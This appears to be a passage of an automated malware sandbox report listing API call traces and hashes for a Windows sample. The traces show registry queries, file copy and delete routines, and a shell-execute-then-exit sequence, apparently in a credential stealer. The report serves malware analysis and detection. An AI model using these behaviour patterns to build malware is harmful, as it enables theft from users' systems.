                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                      • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                      • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                      • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048C151B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048C1522
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 048C153E
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 048C155C
                                      • RegCloseKey.ADVAPI32(?), ref: 048C1566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                      • Instruction ID: a8dd1b2ba3dea022cf1e0725606ac18a37075f715759edc4c6bc76401cf8629a
                                      • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                      • Instruction Fuzzy Hash: 7A01E179E45209BFDB04DFD4DC89FAE7779EB48701F104599FA0597280E770AA008B91
                                      APIs
                                      • __getptd.LIBCMT ref: 0041CA7E
                                        • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                        • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                      • __getptd.LIBCMT ref: 0041CA95
                                      • __amsg_exit.LIBCMT ref: 0041CAA3
                                      • __lock.LIBCMT ref: 0041CAB3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
                                      • Instruction ID: 3f7fe6514f949f75c5091ac4188df1b21daf88bb75e36ed85571065e92ff899f
                                      • Opcode Fuzzy Hash: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
                                      • Instruction Fuzzy Hash: 10F06231A842189BD622FBA95C867DE33A0AF00758F50014FE405562D2CB7C59C186DE
                                      APIs
                                      • __getptd.LIBCMT ref: 048DCCE5
                                        • Part of subcall function 048DC507: __getptd_noexit.LIBCMT ref: 048DC50A
                                        • Part of subcall function 048DC507: __amsg_exit.LIBCMT ref: 048DC517
                                      • __getptd.LIBCMT ref: 048DCCFC
                                      • __amsg_exit.LIBCMT ref: 048DCD0A
                                      • __lock.LIBCMT ref: 048DCD1A
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 048DCD2E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: d86048f8668ea50bb5e5d78fc2f13e62222d90724e777ee8542e60d5572919de
                                      • Instruction ID: ef997d0dffa6d243fba03334ab369872be98ab278501eca07c307d511944609d
                                      • Opcode Fuzzy Hash: d86048f8668ea50bb5e5d78fc2f13e62222d90724e777ee8542e60d5572919de
                                      • Instruction Fuzzy Hash: C3F03032A477119AEB21FBAC9C01F5D3BA06F0076DF220F19D405EB1D0DBA47541EA9B
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                      • ExitProcess.KERNEL32 ref: 004169F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                      • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                      • Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                      • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 048D6B6A
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 048D6C2D
                                      • ExitProcess.KERNEL32 ref: 048D6C5C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                      • Instruction ID: 6ce2bcb176339d49a4ca82067f5c082335dbe92d432dbb025d3b083f95cba50c
                                      • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                      • Instruction Fuzzy Hash: 16312CB1D02218ABEB18EB94DC90FDDB778AF58304F404689E21AE7190DFB46B48CF55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                      • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                      • wsprintfW.USER32 ref: 00418F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 659108358-2783943728
                                      • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                      • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                      • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                      • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                      • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                      • Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                      • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CAC78
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 048CAD96
                                      • lstrlen.KERNEL32(00000000), ref: 048CB053
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4
                                      • DeleteFileA.KERNEL32(00000000), ref: 048CB0DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                      • Instruction ID: 8a8abec6a76eb09e6f10a6b29cb1e83033ef6da01e4df4cd8bd1655ff4876e66
                                      • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                      • Instruction Fuzzy Hash: 5AE1D172D011189BDB1DFBA8DC90DEE7339AF14205F608A59E557F2090EFB07A48CB62
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                      • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                      • Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                      • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CD7E8
                                      • lstrlen.KERNEL32(00000000), ref: 048CD9FF
                                      • lstrlen.KERNEL32(00000000), ref: 048CDA13
                                      • DeleteFileA.KERNEL32(00000000), ref: 048CDA92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                      • Instruction ID: 1946417bd6611d806eca28cc91da7124d82d9d3c2bbbde0be52db9f1f1f6b539
                                      • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                      • Instruction Fuzzy Hash: 2591E372D011189BDB1CFBA8DC50DEE7339AF54209F604A69E517F6090EFB47A48CB62
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                      • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                      • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                      • Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                      • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048CDB68
                                      • lstrlen.KERNEL32(00000000), ref: 048CDD06
                                      • lstrlen.KERNEL32(00000000), ref: 048CDD1A
                                      • DeleteFileA.KERNEL32(00000000), ref: 048CDD99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                      • Instruction ID: d6b3c8288f048356f2586fd736c5aa7af9b52513d05f26c1119037c93a844f59
                                      • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                      • Instruction Fuzzy Hash: 4E810371D011189BDB0CFBA8DC94DEE7339AF54209F604A6DE557E6090EFB47A08CB62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: c44fc65f84a02f7015bb1e29d55c113c8ca5a74601f404fa61264a9a6d869332
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: EA510372E00602AFEB28CF54D848BBA73AAEF82306F14453DE84557298E731F841CB90
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                        • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                        • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                        • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                        • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                        • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                        • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
